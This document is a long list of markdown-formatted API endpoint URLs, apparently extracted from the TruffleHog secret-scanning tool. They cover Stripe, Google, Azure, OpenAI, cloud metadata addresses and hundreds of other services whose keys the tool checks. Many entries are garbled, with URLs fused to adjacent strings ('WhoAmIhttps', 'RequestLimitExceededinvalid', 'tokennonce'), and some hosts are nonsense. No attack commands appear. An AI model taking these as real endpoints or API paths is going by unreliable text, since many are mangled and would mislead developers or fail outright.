[https://api.stripe.com/v1/test_helpers/test_clocks](https://api.stripe.com/v1/test_helpers/test_clocks)
[https://api.stripe.com/v1/tokens/nowaycanthisexist](https://api.stripe.com/v1/tokens/nowaycanthisexist)
[https://app.revampcrm.com/api/1.0/User/WhoAmIhttps](https://app.revampcrm.com/api/1.0/User/WhoAmIhttps)
[https://disqus.com/api/3.0/trends/listThreads.json](https://disqus.com/api/3.0/trends/listThreads.json)
[https://docs.stripe.com/api/checkout/sessions/list](https://docs.stripe.com/api/checkout/sessions/list)
[https://docs.stripe.com/api/issuing/cards/retrieve](https://docs.stripe.com/api/issuing/cards/retrieve)
[https://docs.stripe.com/api/payment_intents/create](https://docs.stripe.com/api/payment_intents/create)
[https://docs.stripe.com/api/promotion_codes/create](https://docs.stripe.com/api/promotion_codes/create)
[https://docs.stripe.com/api/webhook_endpoints/list](https://docs.stripe.com/api/webhook_endpoints/list)
[https://financialmodelingprep.com/api/v3/financial](https://financialmodelingprep.com/api/v3/financial)
[https://gate.sendbird.com/api/v2/applicationshttps](https://gate.sendbird.com/api/v2/applicationshttps)
[https://github.com/trufflesecurity/test_keyscannot](https://github.com/trufflesecurity/test_keyscannot)
[https://howtorotate.com/docs/tutorials/aws/request](https://howtorotate.com/docs/tutorials/aws/request)
[https://howtorotate.com/docs/tutorials/azure/https](https://howtorotate.com/docs/tutorials/azure/https)
[https://howtorotate.com/docs/tutorials/mongo/https](https://howtorotate.com/docs/tutorials/mongo/https)
[https://ws.detectlanguage.com/0.2/user/statushttps](https://ws.detectlanguage.com/0.2/user/statushttps)
[https://www.pivotaltracker.com/services/v5/mehttps](https://www.pivotaltracker.com/services/v5/mehttps)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[https://api.cloudflare.com/client/v4/certificates](https://api.cloudflare.com/client/v4/certificates)
[https://api.fulcrumapp.com/api/v2/forms.jsonhttps](https://api.fulcrumapp.com/api/v2/forms.jsonhttps)
[https://api.pandadoc.com/public/v1/documentshttps](https://api.pandadoc.com/public/v1/documentshttps)
[https://api.planetscale.com/v1/organizationshttps](https://api.planetscale.com/v1/organizationshttps)
[https://api.stripe.com/v1/billing_portal/sessions](https://api.stripe.com/v1/billing_portal/sessions)
[https://api.upcdatabase.org/product/0111222333446](https://api.upcdatabase.org/product/0111222333446)
[https://api.weatherbit.io/v2.0/history/airquality](https://api.weatherbit.io/v2.0/history/airquality)
[https://cloud.iexapis.com/stable/stock/aapl/quote](https://cloud.iexapis.com/stable/stock/aapl/quote)
[https://docs.stripe.com/api/application_fees/list](https://docs.stripe.com/api/application_fees/list)
[https://docs.stripe.com/api/issuing/tokens/update](https://docs.stripe.com/api/issuing/tokens/update)
[https://docs.stripe.com/api/radar/reviews/approve](https://docs.stripe.com/api/radar/reviews/approve)
[https://docs.stripe.com/api/shipping_rates/create](https://docs.stripe.com/api/shipping_rates/create)
[https://docs.stripe.com/api/tax/settings/retrieve](https://docs.stripe.com/api/tax/settings/retrieve)
[https://docs.stripe.com/api/terminal/readers/list](https://docs.stripe.com/api/terminal/readers/list)
[https://docsapi.helpscout.net/v1/collectionshttps](https://docsapi.helpscout.net/v1/collectionshttps)
[https://howtorotate.com/docs/tutorials/groq/https](https://howtorotate.com/docs/tutorials/groq/https)
[https://io.adafruit.com/api/v2/ladybugtest/feeds/](https://io.adafruit.com/api/v2/ladybugtest/feeds/)
[https://salescookie.com/app/Api/CreateTransaction](https://salescookie.com/app/Api/CreateTransaction)
[https://slack.com/api/auth.testCreateCustomerCard](https://slack.com/api/auth.testCreateCustomerCard)
[https://vault.azure.cn/vault.microsoftazure.denot](https://vault.azure.cn/vault.microsoftazure.denot)
[https://www.bugherd.com/api_v2/projects.jsonhttps](https://www.bugherd.com/api_v2/projects.jsonhttps)
[https://yourwebsite.com/callbacks_handler/BuddyNS](https://yourwebsite.com/callbacks_handler/BuddyNS)
[https://api.appointedd.com/v1/availability/slots](https://api.appointedd.com/v1/availability/slots)
[https://api.openai.com/v1/fine_tuning/jobsfailed](https://api.openai.com/v1/fine_tuning/jobsfailed)
[https://api.paymongo.com/v1/payment_methodshttps](https://api.paymongo.com/v1/payment_methodshttps)
[https://api.postbacks.io/v1/requestPostbackhttps](https://api.postbacks.io/v1/requestPostbackhttps)
[https://api.route4me.com/api.v4/address_book.php](https://api.route4me.com/api.v4/address_book.php)
[https://api.sandbox.checkout.com/customers/https](https://api.sandbox.checkout.com/customers/https)
[https://api.stripe.com/v1/payment_method_domains](https://api.stripe.com/v1/payment_method_domains)
[https://api.worksnaps.com/api/projects.xmlunable](https://api.worksnaps.com/api/projects.xmlunable)
[https://docs.stripe.com/api/billing/meter/create](https://docs.stripe.com/api/billing/meter/create)
[https://docs.stripe.com/api/climate/order/create](https://docs.stripe.com/api/climate/order/create)
[https://docs.stripe.com/api/issuing/cards/create](https://docs.stripe.com/api/issuing/cards/create)
[https://docs.stripe.com/api/payment_intents/list](https://docs.stripe.com/api/payment_intents/list)
[https://docs.stripe.com/api/promotion_codes/list](https://docs.stripe.com/api/promotion_codes/list)
[https://docs.stripe.com/api/setup_intents/create](https://docs.stripe.com/api/setup_intents/create)
[https://docs.stripe.com/api/subscriptions/create](https://docs.stripe.com/api/subscriptions/create)
[https://docs.stripe.com/api/usage_records/create](https://docs.stripe.com/api/usage_records/create)
[https://howtorotate.com/docs/tutorials/gcp/https](https://howtorotate.com/docs/tutorials/gcp/https)
[https://oauth2.googleapis.com/tokenoauth2/google](https://oauth2.googleapis.com/tokenoauth2/google)
[https://person.clearbit.com/v1/people/email/alex](https://person.clearbit.com/v1/people/email/alex)
[https://www.ipqualityscore.com/api/json/account/](https://www.ipqualityscore.com/api/json/account/)
[https://www.mindmeister.com/services/rest/oauth2](https://www.mindmeister.com/services/rest/oauth2)
[https://www.worldcoinindex.com/apiservice/ticker](https://www.worldcoinindex.com/apiservice/ticker)
[http://169.254.170.2RequestLimitExceededinvalid](http://169.254.170.2RequestLimitExceededinvalid)
[https://api.enablex.io/voice/v1/call/api/access](https://api.enablex.io/voice/v1/call/api/access)
[https://api.flutterwave.com/v3/subaccountshttps](https://api.flutterwave.com/v3/subaccountshttps)
[https://api.getpostman.com/collections/0/ch1/0/](https://api.getpostman.com/collections/0/ch1/0/)
[https://api.openweathermap.org/data/2.5/weather](https://api.openweathermap.org/data/2.5/weather)
[https://api.peopledatalabs.com/v5/person/enrich](https://api.peopledatalabs.com/v5/person/enrich)
[https://api.pepipost.com/v5.1/domain/getDomains](https://api.pepipost.com/v5.1/domain/getDomains)
[https://api.signupgenius.com/v2/k/user/profile/](https://api.signupgenius.com/v2/k/user/profile/)
[https://api.stripe.com/v1/reporting/report_runs](https://api.stripe.com/v1/reporting/report_runs)
[https://api.surveyanyplace.com/v1/surveys/https](https://api.surveyanyplace.com/v1/surveys/https)
[https://api.unify.id/v1/humandetect/verifyhttps](https://api.unify.id/v1/humandetect/verifyhttps)
[https://app.onepagecrm.com/api/v3/contacts.json](https://app.onepagecrm.com/api/v3/contacts.json)
[https://docs.stripe.com/api/credit_notes/update](https://docs.stripe.com/api/credit_notes/update)
[https://docs.stripe.com/api/shipping_rates/list](https://docs.stripe.com/api/shipping_rates/list)
[https://learning.postman.com/docs/collaborating](https://learning.postman.com/docs/collaborating)
[https://management.core.usgovcloudapi.net/https](https://management.core.usgovcloudapi.net/https)
[https://mandrillapp.com/api/1.0/users/infohttps](https://mandrillapp.com/api/1.0/users/infohttps)
[https://otx.alienvault.com/api/v1/users/mehttps](https://otx.alienvault.com/api/v1/users/mehttps)
[https://run.salesblink.io/api/public/listshttps](https://run.salesblink.io/api/public/listshttps)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl](https://storage.UNIVERSE_DOMAIN/storage/v1/gccl)
[https://unify.apideck.com/vault/consumerscouldn](https://unify.apideck.com/vault/consumerscouldn)
[https://www.mongodb.com/supportability/cosmosdb](https://www.mongodb.com/supportability/cosmosdb)
[https://www.virustotal.com/api/v3/metadatahttps](https://www.virustotal.com/api/v3/metadatahttps)
[https://accounts.google.com/o/oauth2/authhttps](https://accounts.google.com/o/oauth2/authhttps)
[https://api.bitbucket.org/2.0/repositoriesMake](https://api.bitbucket.org/2.0/repositoriesMake)
[https://api.cloudflare.com/client/v4/userhttps](https://api.cloudflare.com/client/v4/userhttps)
[https://api.detectify.com/rest/v2/assets/https](https://api.detectify.com/rest/v2/assets/https)
[https://api.github.com/user/social_accountssql](https://api.github.com/user/social_accountssql)
[https://api.helpcrunch.com/v1/departmentshttps](https://api.helpcrunch.com/v1/departmentshttps)
[https://api.lokalise.com/api2/system/languages](https://api.lokalise.com/api2/system/languages)
[https://api.pinata.cloud/pinning/pinJSONToIPFS](https://api.pinata.cloud/pinning/pinJSONToIPFS)
[https://api.postmarkapp.com/deliverystatshttps](https://api.postmarkapp.com/deliverystatshttps)
[https://api.sherpadesk.com/organizations/https](https://api.sherpadesk.com/organizations/https)
[https://api.stripe.com/v1/billing/meter_events](https://api.stripe.com/v1/billing/meter_events)
[https://api.surveysparrow.com/v1/contactshttps](https://api.surveysparrow.com/v1/contactshttps)
[https://api.travelpayouts.com/v2/prices/latest](https://api.travelpayouts.com/v2/prices/latest)
[https://api.tyntec.com/2fa/v1/applicationerror](https://api.tyntec.com/2fa/v1/applicationerror)
[https://dev.azuresynapse.usgovcloudapi.netdata](https://dev.azuresynapse.usgovcloudapi.netdata)
[https://docs.stripe.com/api/billing/meter/list](https://docs.stripe.com/api/billing/meter/list)
[https://docs.stripe.com/api/climate/order/list](https://docs.stripe.com/api/climate/order/list)
[https://docs.stripe.com/api/fee_refunds/create](https://docs.stripe.com/api/fee_refunds/create)
[https://docs.stripe.com/api/radar/reviews/list](https://docs.stripe.com/api/radar/reviews/list)
[https://docs.stripe.com/api/setup_intents/list](https://docs.stripe.com/api/setup_intents/list)
[https://docs.stripe.com/api/subscriptions/list](https://docs.stripe.com/api/subscriptions/list)
[https://docs.stripe.com/api/test_clocks/create](https://docs.stripe.com/api/test_clocks/create)
[https://docs.stripe.com/api/tokens/create_card](https://docs.stripe.com/api/tokens/create_card)
[https://github.com/golang/protobuf/issues/1609](https://github.com/golang/protobuf/issues/1609)
[https://howtorotate.com/docs/tutorials/twilio/](https://howtorotate.com/docs/tutorials/twilio/)
[https://interseller.io/api/campaigns/listhttps](https://interseller.io/api/campaigns/listhttps)
[https://management.core.chinacloudapi.cn/https](https://management.core.chinacloudapi.cn/https)
[https://mrticktock.com/app/api/is_timer_active](https://mrticktock.com/app/api/is_timer_active)
[https://oauth2.googleapis.com/device/codemssql](https://oauth2.googleapis.com/device/codemssql)
[https://partner_settingscategories.statsGoogle](https://partner_settingscategories.statsGoogle)
[https://pkg.go.dev/cloud.google.com/go/storage](https://pkg.go.dev/cloud.google.com/go/storage)
[https://soccer.sportmonks.com/api/v2.0/leagues](https://soccer.sportmonks.com/api/v2.0/leagues)
[https://stripo.email/emailgeneration/v1/emails](https://stripo.email/emailgeneration/v1/emails)
[https://www.googleapis.com/oauth2/v3/tokeninfo](https://www.googleapis.com/oauth2/v3/tokeninfo)
[https://www.mapquestapi.com/datamanager/v2/get](https://www.mapquestapi.com/datamanager/v2/get)
[https://api.assemblyai.com/v2/transcripthttps](https://api.assemblyai.com/v2/transcripthttps)
[https://api.browshot.com/api/v1/instance/list](https://api.browshot.com/api/v1/instance/list)
[https://api.cashboardapp.com/account.xmlhttps](https://api.cashboardapp.com/account.xmlhttps)
[https://api.cloudconvert.com/v2/users/mehttps](https://api.cloudconvert.com/v2/users/mehttps)
[https://api.contentful.com/organizationshttps](https://api.contentful.com/organizationshttps)
[https://api.foursquare.com/v2/venues/trending](https://api.foursquare.com/v2/venues/trending)
[https://api.leadfeeder.com/accountsunexpected](https://api.leadfeeder.com/accountsunexpected)
[https://api.nicereply.com/v1/users/statshttps](https://api.nicereply.com/v1/users/statshttps)
[https://api.oopspam.com/v1/spamdetectionhttps](https://api.oopspam.com/v1/spamdetectionhttps)
[https://api.openai.com/v1/organizationsfailed](https://api.openai.com/v1/organizationsfailed)
[https://api.pdfshift.io/v3/credits/usagehttps](https://api.pdfshift.io/v3/credits/usagehttps)
[https://api.replicate.com/v1/predictionshttps](https://api.replicate.com/v1/predictionshttps)
[https://api.scaleway.com/instance/v1/zones/fr](https://api.scaleway.com/instance/v1/zones/fr)
[https://api.stripe.com/v1/account/login_links](https://api.stripe.com/v1/account/login_links)
[https://api.todoist.com/rest/v2/projectshttps](https://api.todoist.com/rest/v2/projectshttps)
[https://api.transferwise.com/v2/profileshttps](https://api.transferwise.com/v2/profileshttps)
[https://api.twelvedata.com/earliest_timestamp](https://api.twelvedata.com/earliest_timestamp)
[https://api.zerotier.com/api/v1/networkBranch](https://api.zerotier.com/api/v1/networkBranch)
[https://app.besnappy.com/api/v1/accountshttps](https://app.besnappy.com/api/v1/accountshttps)
[https://app.karmacrm.com/api/v3/contacts.json](https://app.karmacrm.com/api/v3/contacts.json)
[https://app.timecamp.com/third_party/api/user](https://app.timecamp.com/third_party/api/user)
[https://cloud.digitalocean.com/v1/oauth/token](https://cloud.digitalocean.com/v1/oauth/token)
[https://cloud.iexapis.com/v1/stock/aapl/quote](https://cloud.iexapis.com/v1/stock/aapl/quote)
[https://connect.squareup.com/oauth2/authorize](https://connect.squareup.com/oauth2/authorize)
[https://docs.stripe.com/api/credit_notes/list](https://docs.stripe.com/api/credit_notes/list)
[https://github.com/trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog)
[https://google.com&width=1920&height=1080xoxb](https://google.com&width=1920&height=1080xoxb)
[https://howtorotate.com/docs/tutorials/slack/](https://howtorotate.com/docs/tutorials/slack/)
[https://iamcredentials.UNIVERSE_DOMAIN/failed](https://iamcredentials.UNIVERSE_DOMAIN/failed)
[https://iamcredentials.googleapis.com/openpgp](https://iamcredentials.googleapis.com/openpgp)
[https://management.microsoftazure.de/expected](https://management.microsoftazure.de/expected)
[https://opentelemetry.io/schemas/1.17.0grpclb](https://opentelemetry.io/schemas/1.17.0grpclb)
[https://restpack.io/api/screenshot/usagehttps](https://restpack.io/api/screenshot/usagehttps)
[https://trufflesecurity.com/canariesGetGeoAPI](https://trufflesecurity.com/canariesGetGeoAPI)
[http://169.254.169.254/latest/api/tokennonce](http://169.254.169.254/latest/api/tokennonce)
[http://www.collada.org/2005/11/COLLADASchema](http://www.collada.org/2005/11/COLLADASchema)
[https://api.atlassian.com/admin/v1/orgshttps](https://api.atlassian.com/admin/v1/orgshttps)
[https://api.capsulecrm.com/api/v2/usershttps](https://api.capsulecrm.com/api/v2/usershttps)
[https://api.cloudsmith.io/v1/user/self/https](https://api.cloudsmith.io/v1/user/self/https)
[https://api.conversiontools.io/v1/taskshttps](https://api.conversiontools.io/v1/taskshttps)
[https://api.crowdin.com/api/v2/storageshttps](https://api.crowdin.com/api/v2/storageshttps)
[https://api.digitalocean.com/v2/accounthttps](https://api.digitalocean.com/v2/accounthttps)
[https://api.enigma.com/businesses/matchhttps](https://api.enigma.com/businesses/matchhttps)
[https://api.fmfw.io/api/3/spot/balancegithub](https://api.fmfw.io/api/3/spot/balancegithub)
[https://api.fullstory.com/operations/v1https](https://api.fullstory.com/operations/v1https)
[https://api.getresponse.com/v3/accountshttps](https://api.getresponse.com/v3/accountshttps)
[https://api.holistic.dev/api/v1/projecthttps](https://api.holistic.dev/api/v1/projecthttps)
[https://api.instamojo.com/oauth2/token/https](https://api.instamojo.com/oauth2/token/https)
[https://api.loyverse.com/v1.0/merchant/https](https://api.loyverse.com/v1.0/merchant/https)
[https://api.mailjet.com/v3/REST/messagehttps](https://api.mailjet.com/v3/REST/messagehttps)
[https://api.openai.com/v1/images/generations](https://api.openai.com/v1/images/generations)
[https://api.opencagedata.com/geocode/v1/json](https://api.opencagedata.com/geocode/v1/json)
[https://api.ramp.com/developer/v1/tokenhttps](https://api.ramp.com/developer/v1/tokenhttps)
[https://api.stripe.com/v1/terminal/locations](https://api.stripe.com/v1/terminal/locations)
[https://api.wistia.com/v1/stats/account.json](https://api.wistia.com/v1/stats/account.json)
[https://apis.paralleldots.com/v4/intenterror](https://apis.paralleldots.com/v4/intenterror)
[https://app.ayrshare.com/api/analytics/links](https://app.ayrshare.com/api/analytics/links)
[https://app.zenscrape.com/api/v1/statushttps](https://app.zenscrape.com/api/v1/statushttps)
[https://base.zenkit.com/api/v1/users/mehttps](https://base.zenkit.com/api/v1/users/mehttps)
[https://dashboard.chatfuel.com/api/botshttps](https://dashboard.chatfuel.com/api/botshttps)
[https://docs.stripe.com/api/customers/update](https://docs.stripe.com/api/customers/update)
[https://docs.stripe.com/api/sources/retrieve](https://docs.stripe.com/api/sources/retrieve)
[https://docs.stripe.com/api/tax_rates/create](https://docs.stripe.com/api/tax_rates/create)
[https://docs.stripe.com/api/test_clocks/list](https://docs.stripe.com/api/test_clocks/list)
[https://docs.stripe.com/api/transfers/create](https://docs.stripe.com/api/transfers/create)
[https://onfleet.com/api/v2/organizationhttps](https://onfleet.com/api/v2/organizationhttps)
[https://search.censys.io/api/v1/accounthttps](https://search.censys.io/api/v1/accounthttps)
[https://sslmate.com/api/v2/certs/example.com](https://sslmate.com/api/v2/certs/example.com)
[https://storage.googleapis.com/storage/v1/b/](https://storage.googleapis.com/storage/v1/b/)
[https://v3.api.hypertrack.com/trips/expected](https://v3.api.hypertrack.com/trips/expected)
[https://www.diggernaut.com/api/projectshttps](https://www.diggernaut.com/api/projectshttps)
[https://www.streak.com/api/v1/pipelineshttps](https://www.streak.com/api/v1/pipelineshttps)
[https://www.versioneye.com/api/v1/scanshttps](https://www.versioneye.com/api/v1/scanshttps)
[https://api.aeroworkflow.com/api/unexpected](https://api.aeroworkflow.com/api/unexpected)
[https://api.apiscience.com/v1/monitorshttps](https://api.apiscience.com/v1/monitorshttps)
[https://api.artsy.net/api/tokens/xapp_token](https://api.artsy.net/api/tokens/xapp_token)
[https://api.baremetrics.com/v1/accounthttps](https://api.baremetrics.com/v1/accounthttps)
[https://api.iconfinder.com/v4/iconsetslogin](https://api.iconfinder.com/v4/iconsetslogin)
[https://api.lexigram.io/v1/lexigraph/search](https://api.lexigram.io/v1/lexigraph/search)
[https://api.mailerlite.com/api/v2/campaigns](https://api.mailerlite.com/api/v2/campaigns)
[https://api.na1.insightly.com/v3.1/Contacts](https://api.na1.insightly.com/v3.1/Contacts)
[https://api.polygon.io/v2/reference/locales](https://api.polygon.io/v2/reference/locales)
[https://api.prefect.cloud/auth/loginInclude](https://api.prefect.cloud/auth/loginInclude)
[https://api.pulumi.com/api/user/stackshttps](https://api.pulumi.com/api/user/stackshttps)
[https://api.pushbullet.com/v2/users/mehttps](https://api.pushbullet.com/v2/users/mehttps)
[https://api.qualaroo.com/api/v1/nudgeshttps](https://api.qualaroo.com/api/v1/nudgeshttps)
[https://api.screenshotlayer.com/api/capture](https://api.screenshotlayer.com/api/capture)
[https://api.securitytrails.com/v1/pinghttps](https://api.securitytrails.com/v1/pinghttps)
[https://api.storyblok.com/v1/cdn/spaces/me/](https://api.storyblok.com/v1/cdn/spaces/me/)
[https://api.stripe.com/v1/apple_pay/domains](https://api.stripe.com/v1/apple_pay/domains)
[https://api.stripe.com/v1/checkout/sessions](https://api.stripe.com/v1/checkout/sessions)
[https://api.stripe.com/v1/customer_sessions](https://api.stripe.com/v1/customer_sessions)
[https://api.stripe.com/v1/webhook_endpoints](https://api.stripe.com/v1/webhook_endpoints)
[https://api.tickettailor.com/v1/ordershttps](https://api.tickettailor.com/v1/ordershttps)
[https://api.websitepulse.com/textserver.php](https://api.websitepulse.com/textserver.php)
[https://api.zipbooks.com/v2/auth/loginTotal](https://api.zipbooks.com/v2/auth/loginTotal)
[https://auth.freshbooks.com/oauth/authorize](https://auth.freshbooks.com/oauth/authorize)
[https://docs.stripe.com/api/disputes/update](https://docs.stripe.com/api/disputes/update)
[https://docs.stripe.com/api/invoices/create](https://docs.stripe.com/api/invoices/create)
[https://docs.stripe.com/api/products/create](https://docs.stripe.com/api/products/create)
[https://docs.stripe.com/api/tokens/retrieve](https://docs.stripe.com/api/tokens/retrieve)
[https://finnhub.io/api/v1/calendar/economic](https://finnhub.io/api/v1/calendar/economic)
[https://github.com/login/oauth/authorizekey](https://github.com/login/oauth/authorizekey)
[https://howtorotate.com/docs/tutorials/npm/](https://howtorotate.com/docs/tutorials/npm/)
[https://login.microsoftonline.com/semaphore](https://login.microsoftonline.com/semaphore)
[https://rest.textmagic.com/api/v2/userhttps](https://rest.textmagic.com/api/v2/userhttps)
[https://restpack.io/api/html2pdf/usagehttps](https://restpack.io/api/html2pdf/usagehttps)
[https://us.qubole.com/api/v1.2/accounthttps](https://us.qubole.com/api/v1.2/accounthttps)
[https://www.dnscheck.co/api/v1/groups/https](https://www.dnscheck.co/api/v1/groups/https)
[https://api.anthropic.com/v1/messageshttps](https://api.anthropic.com/v1/messageshttps)
[https://api.app.shortcut.com/api/v3/member](https://api.app.shortcut.com/api/v3/member)
[https://api.bugsnag.com/user/organizations](https://api.bugsnag.com/user/organizations)
[https://api.calorieninjas.com/v1/nutrition](https://api.calorieninjas.com/v1/nutrition)
[https://api.cloudimage.com/invalidatehttps](https://api.cloudimage.com/invalidatehttps)
[https://api.currentsapi.services/v1/latest](https://api.currentsapi.services/v1/latest)
[https://api.geoapify.com/v1/geocode/search](https://api.geoapify.com/v1/geocode/search)
[https://api.getgeoapi.com/v2/currency/list](https://api.getgeoapi.com/v2/currency/list)
[https://api.monkeylearn.com/v3/classifiers](https://api.monkeylearn.com/v3/classifiers)
[https://api.pipedream.com/v1/users/mehttps](https://api.pipedream.com/v1/users/mehttps)
[https://api.shotstack.io/stage/renderhttps](https://api.shotstack.io/stage/renderhttps)
[https://api.shutterstock.com/v2/userhelper](https://api.shutterstock.com/v2/userhelper)
[https://api.sigopt.com/v1/experimentshttps](https://api.sigopt.com/v1/experimentshttps)
[https://api.smartsheet.com/2.0/sheetshttps](https://api.smartsheet.com/2.0/sheetshttps)
[https://api.spoonacular.com/recipes/random](https://api.spoonacular.com/recipes/random)
[https://api.stitchdata.com/v4/sourceshttps](https://api.stitchdata.com/v4/sourceshttps)
[https://api.stormglass.io/v2/weather/point](https://api.stormglass.io/v2/weather/point)
[https://api.stripe.com/v1/terminal/readers](https://api.stripe.com/v1/terminal/readers)
[https://api.tradier.com/v1/watchlistshttps](https://api.tradier.com/v1/watchlistshttps)
[https://api.uptimerobot.com/v2/getMonitors](https://api.uptimerobot.com/v2/getMonitors)
[https://api.us2.sumologic.com/api/v1/users](https://api.us2.sumologic.com/api/v1/users)
[https://api.vercel.com/www/userenumerating](https://api.vercel.com/www/userenumerating)
[https://api.voicegain.ai/v1/sa/confighttps](https://api.voicegain.ai/v1/sa/confighttps)
[https://api.web3.storage/user/uploadshttps](https://api.web3.storage/user/uploadshttps)
[https://app.apacta.com/api/v1/time_entries](https://app.apacta.com/api/v1/time_entries)
[https://app.asana.com/api/1.0/users/meRead](https://app.asana.com/api/1.0/users/meRead)
[https://app.launchdarkly.com/api/v2/caller](https://app.launchdarkly.com/api/v2/caller)
[https://batch.core.usgovcloudapi.net/https](https://batch.core.usgovcloudapi.net/https)
[https://database.chinacloudapi.cn/expected](https://database.chinacloudapi.cn/expected)
[https://docs.stripe.com/api/charges/update](https://docs.stripe.com/api/charges/update)
[https://docs.stripe.com/api/coupons/create](https://docs.stripe.com/api/coupons/create)
[https://docs.stripe.com/api/customers/list](https://docs.stripe.com/api/customers/list)
[https://docs.stripe.com/api/payouts/create](https://docs.stripe.com/api/payouts/create)
[https://docs.stripe.com/api/sources/update](https://docs.stripe.com/api/sources/update)
[https://docs.stripe.com/api/tax_ids/create](https://docs.stripe.com/api/tax_ids/create)
[https://docs.stripe.com/api/tax_rates/list](https://docs.stripe.com/api/tax_rates/list)
[https://docs.stripe.com/api/transfers/list](https://docs.stripe.com/api/transfers/list)
[https://management.usgovcloudapi.net/https](https://management.usgovcloudapi.net/https)
[https://rest.clicksend.com/v3/accounthttps](https://rest.clicksend.com/v3/accounthttps)
[https://rest.messagebird.com/messageshttps](https://rest.messagebird.com/messageshttps)
[https://rubygems.org/api/v1/gems.jsonerror](https://rubygems.org/api/v1/gems.jsonerror)
[https://servicebus.usgovcloudapi.net/https](https://servicebus.usgovcloudapi.net/https)
[https://trufflesecurity.com/contacted25519](https://trufflesecurity.com/contacted25519)
[https://webexapis.com/v1/access_tokenhttps](https://webexapis.com/v1/access_tokenhttps)
[https://www.clinchpad.com/api/v1/pipelines](https://www.clinchpad.com/api/v1/pipelines)
[https://www.eventbriteapi.com/v3/users/me/](https://www.eventbriteapi.com/v3/users/me/)
[https://www.formbucket.com/v1/profilehttps](https://www.formbucket.com/v1/profilehttps)
[https://api.agora.io/dev/v1/projectshttps](https://api.agora.io/dev/v1/projectshttps)
[https://api.clarifai.com/v2/users/mehttps](https://api.clarifai.com/v2/users/mehttps)
[https://api.dareboost.com/0.8/confighttps](https://api.dareboost.com/0.8/confighttps)
[https://api.exchangeratesapi.io/v1/latest](https://api.exchangeratesapi.io/v1/latest)
[https://api.hellosign.com/v3/accounthttps](https://api.hellosign.com/v3/accounthttps)
[https://api.html2pdf.app/v1/generatehttps](https://api.html2pdf.app/v1/generatehttps)
[https://api.lemonsqueezy.com/v1/products/](https://api.lemonsqueezy.com/v1/products/)
[https://api.mailmodo.com/api/v1/campaigns](https://api.mailmodo.com/api/v1/campaigns)
[https://api.netlify.com/api/v1/siteshttps](https://api.netlify.com/api/v1/siteshttps)
[https://api.nftport.xyz/me/contractshttps](https://api.nftport.xyz/me/contractshttps)
[https://api.rebrandly.com/v1/accounthttps](https://api.rebrandly.com/v1/accounthttps)
[https://api.request.finance/invoiceshttps](https://api.request.finance/invoiceshttps)
[https://api.ritekit.com/v1/stats/multiple](https://api.ritekit.com/v1/stats/multiple)
[https://api.skrapp.io/api/v2/accounthttps](https://api.skrapp.io/api/v2/accounthttps)
[https://api.stripe.com/v1/payment_intents](https://api.stripe.com/v1/payment_intents)
[https://api.stripe.com/v1/promotion_codes](https://api.stripe.com/v1/promotion_codes)
[https://api.supabase.com/v1/projectshttps](https://api.supabase.com/v1/projectshttps)
[https://api.taxjar.com/v2/categorieshttps](https://api.taxjar.com/v2/categorieshttps)
[https://api.us1.signalfx.com/v2/dashboard](https://api.us1.signalfx.com/v2/dashboard)
[https://api.webscraper.io/api/v1/sitemaps](https://api.webscraper.io/api/v1/sitemaps)
[https://api.yelp.com/v3/businesses/search](https://api.yelp.com/v3/businesses/search)
[https://app.eraser.io/api/render/elements](https://app.eraser.io/api/render/elements)
[https://app.nimble.com/api/v1/myselfhttps](https://app.nimble.com/api/v1/myselfhttps)
[https://app.zipcodebase.com/api/v1/search](https://app.zipcodebase.com/api/v1/search)
[https://docs.stripe.com/api/account_links](https://docs.stripe.com/api/account_links)
[https://docs.stripe.com/api/disputes/list](https://docs.stripe.com/api/disputes/list)
[https://docs.stripe.com/api/invoices/list](https://docs.stripe.com/api/invoices/list)
[https://docs.stripe.com/api/prices/create](https://docs.stripe.com/api/prices/create)
[https://docs.stripe.com/api/products/list](https://docs.stripe.com/api/products/list)
[https://docs.stripe.com/api/quotes/update](https://docs.stripe.com/api/quotes/update)
[https://docs.stripe.com/api/topups/create](https://docs.stripe.com/api/topups/create)
[https://dynalist.io/api/v1/file/listhttps](https://dynalist.io/api/v1/file/listhttps)
[https://extractorapi.com/api/v1/extractor](https://extractorapi.com/api/v1/extractor)
[https://go.urbanairship.com/api/schedules](https://go.urbanairship.com/api/schedules)
[https://hooman.pipedrive.com/api/v1/users](https://hooman.pipedrive.com/api/v1/users)
[https://iamcredentials.googleapis.com/v1/](https://iamcredentials.googleapis.com/v1/)
[https://management.chinacloudapi.cn/https](https://management.chinacloudapi.cn/https)
[https://management.core.windows.net/https](https://management.core.windows.net/https)
[https://microsoftgraph.chinacloudapi.cngo](https://microsoftgraph.chinacloudapi.cngo)
[https://oss.trufflehog.org/updatesillegal](https://oss.trufflehog.org/updatesillegal)
[https://packagecloud.io/api/v1/reposhttps](https://packagecloud.io/api/v1/reposhttps)
[https://powrbot.com/api/v1/search/single/](https://powrbot.com/api/v1/search/single/)
[https://rest.coinapi.io/v1/exchangeshttps](https://rest.coinapi.io/v1/exchangeshttps)
[https://sandbox.impala.travel/v1/bookings](https://sandbox.impala.travel/v1/bookings)
[https://servicebus.chinacloudapi.cn/https](https://servicebus.chinacloudapi.cn/https)
[https://shot.screenshotapi.net/screenshot](https://shot.screenshotapi.net/screenshot)
[https://trufflesecurity.com/trufflehogmax](https://trufflesecurity.com/trufflehogmax)
[https://us1.locationiq.com/v1/reverse.php](https://us1.locationiq.com/v1/reverse.php)
[https://www.buddyns.com/api/v2/zone/https](https://www.buddyns.com/api/v2/zone/https)
[https://www.nuget.org/api/v2/packagehttps](https://www.nuget.org/api/v2/packagehttps)
[http://169.254.169.254BalancerAttributes](http://169.254.169.254BalancerAttributes)
[http://ocsp.snowflakecomputing.comFailed](http://ocsp.snowflakecomputing.comFailed)
[https://api.appoptics.com/v1/metricshost](https://api.appoptics.com/v1/metricshost)
[https://api.apptivo.com/app/dao/v6/leads](https://api.apptivo.com/app/dao/v6/leads)
[https://api.autoklose.com/api/campaigns/](https://api.autoklose.com/api/campaigns/)
[https://api.aviationstack.com/v1/flights](https://api.aviationstack.com/v1/flights)
[https://api.bulksms.com/v1/messageshttps](https://api.bulksms.com/v1/messageshttps)
[https://api.clickup.com/api/v2/userhttps](https://api.clickup.com/api/v2/userhttps)
[https://api.clockify.me/api/v1/userhttps](https://api.clockify.me/api/v1/userhttps)
[https://api.codeclimate.com/v1/userhttps](https://api.codeclimate.com/v1/userhttps)
